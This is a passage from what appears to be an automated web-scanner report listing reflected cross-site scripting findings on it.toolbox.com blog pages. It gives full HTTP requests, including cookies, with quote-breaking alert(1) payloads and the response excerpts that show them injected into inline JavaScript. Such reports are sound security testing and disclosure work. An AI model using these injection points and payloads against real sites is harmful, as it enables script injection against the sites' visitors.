The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2483'-alert(1)-'56ce208cc66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/?c2483'-alert(1)-'56ce208cc66=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63736
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26c2483'-alert(1)-'56ce208cc66%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.42. http://it.toolbox.com/blogs/ppmtoday/categories/future+states/2379 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/categories/future+states/2379

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c79b'-alert(1)-'bf6491b2e46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/categories/6c79b'-alert(1)-'bf6491b2e46/2379 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%266c79b'-alert(1)-'bf6491b2e46%2f2379';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.43. http://it.toolbox.com/blogs/ppmtoday/categories/recommended+reading/1191 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/categories/recommended+reading/1191

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fd03'-alert(1)-'5edd216a3b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/categories/2fd03'-alert(1)-'5edd216a3b5/1191 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61383
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%262fd03'-alert(1)-'5edd216a3b5%2f1191';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.44. http://it.toolbox.com/blogs/ppmtoday/categories/thinking+out+loud/2765 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/categories/thinking+out+loud/2765

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb4b'-alert(1)-'b15eda6d188 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/categories/4cb4b'-alert(1)-'b15eda6d188/2765 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61383
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%264cb4b'-alert(1)-'b15eda6d188%2f2765';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.45. http://it.toolbox.com/blogs/ppmtoday/categories/war+stories/1192 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/categories/war+stories/1192

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ce90'-alert(1)-'1098153feb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/categories/6ce90'-alert(1)-'1098153feb9/1192 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%266ce90'-alert(1)-'1098153feb9%2f1192';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.46. http://it.toolbox.com/blogs/ppmtoday/categories/white+papers/1193 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/categories/white+papers/1193

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80718'-alert(1)-'50bcf3adcd9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/categories/80718'-alert(1)-'50bcf3adcd9/1193 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61383
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%2680718'-alert(1)-'50bcf3adcd9%2f1193';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.47. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/change-origins-39674

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62752'-alert(1)-'917fbaa7ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/62752'-alert(1)-'917fbaa7ac8 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2662752'-alert(1)-'917fbaa7ac8';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.48. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/change-origins-39674

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6adc7'-alert(1)-'c1d11b6e461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/change-origins-39674?6adc7'-alert(1)-'c1d11b6e461=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68916
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Change Orig
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d39674%266adc7'-alert(1)-'c1d11b6e461%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.49. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f57ac'-alert(1)-'b6aa0518d05 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/f57ac'-alert(1)-'b6aa0518d05 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26f57ac'-alert(1)-'b6aa0518d05';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.50. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f05d3'-alert(1)-'3e9e700a587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066?f05d3'-alert(1)-'3e9e700a587=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67587
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Does John S
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42066%26f05d3'-alert(1)-'3e9e700a587%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.51. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/dx3-data-driven-decisions-41860

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7389a'-alert(1)-'c353bec37b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/7389a'-alert(1)-'c353bec37b3 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%267389a'-alert(1)-'c353bec37b3';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.52. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/dx3-data-driven-decisions-41860

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89332'-alert(1)-'7884c23ec6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/dx3-data-driven-decisions-41860?89332'-alert(1)-'7884c23ec6a=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73313
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Dx3: Data D
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d41860%2689332'-alert(1)-'7884c23ec6a%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.53. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/elementary-school-and-saas-38160

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 153bd'-alert(1)-'8a6f1963125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/153bd'-alert(1)-'8a6f1963125 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26153bd'-alert(1)-'8a6f1963125';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.54. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/elementary-school-and-saas-38160

Issue detail

